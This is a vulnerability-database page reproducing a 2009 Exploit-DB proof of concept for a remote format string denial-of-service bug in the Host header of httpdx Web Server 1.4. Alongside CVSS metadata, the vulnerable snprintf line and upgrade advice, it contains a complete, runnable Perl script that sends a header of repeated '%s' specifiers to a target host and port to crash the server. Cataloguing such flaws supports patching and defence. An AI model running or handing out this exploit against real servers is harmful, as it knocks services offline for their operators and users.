httpdx Web Server 1.4 'Host Header' Remote Format String Denial of Service PoC

vendor:

httpdx Web Server

by:

Pankaj Kohli

7.5

CVSS

HIGH

Remote Format String Vulnerability

134

CWE

Product Name: httpdx Web Server

Affected Version From: 1.4

Affected Version To: 1.4

Patch Exists: YES

Related CWE: N/A

CPE: a:httpdx:httpdx_web_server:1.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

httpdx Web Server 1.4 ‘Host Header’ Remote Format String Denial of Service PoC

httpdx web server 1.4 is vulnerable to a remote format string vulnerability through the Host header. The vulnerability lies in httpd_src/http.cpp in h_readrequest() : snprintf(temp[1],MAX,client->host); An attacker can send a maliciously crafted Host header to the vulnerable server, which will cause a denial of service.

Mitigation:

Upgrade to the latest version of httpdx Web Server.

Source

Exploit-DB raw data:

# httpdx Web Server 1.4 'Host Header' Remote Format String Denial of Service PoC
# 
# Coded by Pankaj Kohli
# http://www.pank4j.com
#
# httpdx web server 1.4 is vulnerable to a remote format string vulnerability through the Host header.
# The vulnerability lies in httpd_src/http.cpp in h_readrequest() : snprintf(temp[1],MAX,client->host);
#

use LWP;

(($target = $ARGV[0]) && ($port = $ARGV[1])) || die "Usage: $0 <target> <port> \n";

my $ua = new LWP::UserAgent;
print "Connecting to $target on port $port\n";
my $request = new HTTP::Request('GET', "http://" . $target . ":" . $port);
print "Sending evil header \n";
my $host_header =  "%s"x32;
$request->header('Host', $host_header); my $response = $ua->request($request);

if ($response->is_success) { print "DoS Failed \n" }
else { print "DoS Successful \n" } 

# milw0rm.com [2009-09-14]